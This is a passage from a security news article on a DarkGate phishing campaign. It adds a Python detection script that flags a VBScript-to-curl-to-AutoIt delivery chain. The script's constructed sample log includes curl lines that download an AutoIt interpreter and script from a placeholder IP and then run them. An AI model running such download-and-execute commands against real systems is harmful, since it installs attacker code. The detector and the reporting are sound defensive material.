Malware DarkGate Spreads via Phishing Mails

Security researchers have uncovered a new malspam (malicious spam) campaign in which victims are infected with a piece of malware called DarkGate.

Telekom Security researchers suspect that the sudden increase in DarkGate activity is due to the developer having started to rent the malware out to a limited group of affiliates.

According to the company's detailed report, the attack starts with a phishing link that sends the victim through a traffic distribution system (TDS) to a malicious MSI file. Downloading and executing that file kicks off a multi-stage process that ends with DarkGate being decoded and launched.

The researchers also observed an alternative delivery method in which a Visual Basic script (VBScript) is used instead of the MSI file. That script uses curl to download the AutoIt executable together with the AutoIt script that the executable runs. How the VBScript itself reaches the victim's system is currently unknown.
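The VBScript variant leaves a recognisable parent/child trail on the endpoint: a Windows script host launching curl, curl writing an AutoIt interpreter and a .au3 script into a user-writable directory, and then that interpreter being executed from the same place. The following Python detection is an added example, not code from Telekom Security's report or from the DarkGate operators; the pipe-delimited log format, the sample events, the paths, the IP address and the rule names are all constructed for illustration.

```python
"""Flag the VBScript -> curl -> AutoIt delivery chain in process-creation logs.

Assumed log format (constructed for this example, not any vendor's schema):
    pid|ppid|image_path|command_line
"""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOADERS = {"curl.exe"}
AUTOIT_BINARIES = {"autoit3.exe"}
# An AutoIt interpreter or .au3 script named on a curl command line
AUTOIT_ARTIFACT = re.compile(r"(?:autoit3\.exe|\.au3)\b", re.I)
# Paths a standard user can write to; a legitimate AutoIt install lives under Program Files
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public|Downloads)\\", re.I)

# Constructed sample log: one malicious chain (pids 200-400) plus a benign curl (pid 500)
SAMPLE_LOG = [
    "100|1|C:\\Windows\\explorer.exe|explorer.exe",
    "200|100|C:\\Windows\\System32\\wscript.exe|wscript.exe C:\\Users\\u\\AppData\\Local\\Temp\\invoice.vbs",
    "300|200|C:\\Windows\\System32\\curl.exe|curl -o C:\\Users\\u\\AppData\\Roaming\\Autoit3.exe http://198.51.100.7/Autoit3.exe",
    "301|200|C:\\Windows\\System32\\curl.exe|curl -o C:\\Users\\u\\AppData\\Roaming\\script.au3 http://198.51.100.7/script.au3",
    "400|200|C:\\Users\\u\\AppData\\Roaming\\Autoit3.exe|Autoit3.exe C:\\Users\\u\\AppData\\Roaming\\script.au3",
    "500|100|C:\\Windows\\System32\\curl.exe|curl -o C:\\Users\\u\\Downloads\\readme.txt https://example.org/readme.txt",
]


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_event(line: str) -> ProcEvent:
    pid, ppid, image, cmdline = line.split("|", 3)
    return ProcEvent(int(pid), int(ppid), image.strip(), cmdline.strip())


def find_chain(lines):
    """Return a list of findings; each has pid, ppid, rule and severity."""
    events = [parse_event(line) for line in lines if line.strip()]
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        # Rule 1: a Windows script host spawning curl; high if it pulls AutoIt pieces
        if name in DOWNLOADERS and pname in SCRIPT_HOSTS:
            sev = "high" if AUTOIT_ARTIFACT.search(e.cmdline) else "medium"
            findings.append({"pid": e.pid, "ppid": e.ppid,
                             "rule": "script_host_spawns_curl", "severity": sev})
        # Rule 2: the AutoIt interpreter running from a user-writable directory
        if name in AUTOIT_BINARIES and USER_WRITABLE.search(e.image):
            findings.append({"pid": e.pid, "ppid": e.ppid,
                             "rule": "autoit_from_user_writable", "severity": "high"})
    # Correlation: one script-host parent that both fetched AutoIt pieces and ran AutoIt
    strong_by_parent = {}
    for f in findings:
        if f["severity"] == "high":
            strong_by_parent.setdefault(f["ppid"], set()).add(f["rule"])
    for ppid, rules in strong_by_parent.items():
        if {"script_host_spawns_curl", "autoit_from_user_writable"} <= rules:
            findings.append({"pid": ppid,
                             "ppid": by_pid[ppid].ppid if ppid in by_pid else None,
                             "rule": "darkgate_style_chain", "severity": "critical"})
    return findings


if __name__ == "__main__":
    for f in find_chain(SAMPLE_LOG):
        print(f"{f['severity']:8} pid={f['pid']} rule={f['rule']}")
```

The two per-event rules are deliberately broad (a script host calling curl is unusual but not unheard of in admin tooling); the correlation step is what turns them into a confident verdict, because it requires the same script-host process to have both fetched AutoIt pieces and executed the interpreter from a user-writable path. Against real Sysmon or EDR telemetry, replace `parse_event` with the vendor's field mapping and keep the rest.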

DarkGate, which is sold on underground forums by an actor known as "Rastafareye", can evade antivirus software and make system changes through the Windows registry. It is also able to steal data from browsers and from applications such as Discord and FileZilla.

The malware connects to a command-and-control server for a range of malicious activities, including file theft, cryptocurrency mining, remote screenshot capture and execution of further commands. Earlier versions of DarkGate also shipped a ransomware module.

DarkGate is offered on a subscription basis at prices ranging from $1,000 per day to $100,000 per year. Its developer markets it as the "ultimate tool for penetration testers", but it is widely recognised as malware rather than a legitimate pentesting tool.

Phishing remains the primary method for distributing loaders and other malware, including KrakenKeylogger, QakBot, Raccoon Stealer and more. According to a recent report by HP Wolf Security, email-based attacks accounted for
